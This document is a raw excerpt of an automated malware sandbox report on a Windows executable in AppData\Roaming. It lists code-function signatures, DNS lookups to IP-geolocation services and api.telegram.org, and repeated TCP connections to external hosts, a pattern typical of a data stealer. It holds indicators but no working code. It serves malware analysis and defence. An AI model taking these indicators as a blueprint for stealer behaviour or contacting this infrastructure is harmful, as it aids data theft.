                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BC3A2h7_2_006BC0A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B1571h7_2_006B12A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B8412h7_2_006B80A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B989Ah7_2_006B95A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B5581h7_2_006B52B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BEEAAh7_2_006BEBB0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BB082h7_2_006BAD88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B4C51h7_2_006B4980
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006B2C69h7_2_006B2998
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006BDB8Ah7_2_006BD890
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D1FEAh7_2_006D1CF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D4162h7_2_006D3E68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D033Ah7_2_006D0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D1B22h7_2_006D1828
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D330Ah7_2_006D3010
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D37D2h7_2_006D34D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D297Bh7_2_006D2680
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D1192h7_2_006D0E98
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D165Ah7_2_006D1360
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D2E42h7_2_006D2B48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D0802h7_2_006D0508
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D0CCAh7_2_006D09D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D3C9Ah7_2_006D39A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006D24B2h7_2_006D21B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F55D9h7_2_006F5330
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FAD11h7_2_006FAA68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F4021h7_2_006F3D78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FC721h7_2_006FC478
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FEC49h7_2_006FE978
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FBA19h7_2_006FB770
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F3319h7_2_006F3070
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F7CF1h7_2_006F7A48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FFA11h7_2_006FF740
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F6FE9h7_2_006F6D40
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F9701h7_2_006F9458
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F89F9h7_2_006F8750
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FCFD1h7_2_006FCD28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F48D1h7_2_006F4628
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FC2C9h7_2_006FC020
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F3BC9h7_2_006F3920
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F62E1h7_2_006F6038
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FDCD9h7_2_006FDA30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F92A9h7_2_006F9000
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FB5C1h7_2_006FB318
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FF0E1h7_2_006FEE10
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F6B91h7_2_006F68E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F5E89h7_2_006F5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FE7B1h7_2_006FE4E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F85A1h7_2_006F82F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F7899h7_2_006F75F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FBE71h7_2_006FBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F3771h7_2_006F34C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FB169h7_2_006FAEC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F5181h7_2_006F4ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FD881h7_2_006FD5D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FCB7Bh7_2_006FC8D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F4479h7_2_006F41D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FF579h7_2_006FF2A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F8E51h7_2_006F8BA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F8149h7_2_006F7EA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F9B59h7_2_006F98B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F5A31h7_2_006F5788
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FE1C5h7_2_006FDE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FD429h7_2_006FD180
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F4D29h7_2_006F4A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F7441h7_2_006F7198
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F6739h7_2_006F6490
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00765F38
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00765F28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00762E16
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00762B00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00762AF2
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
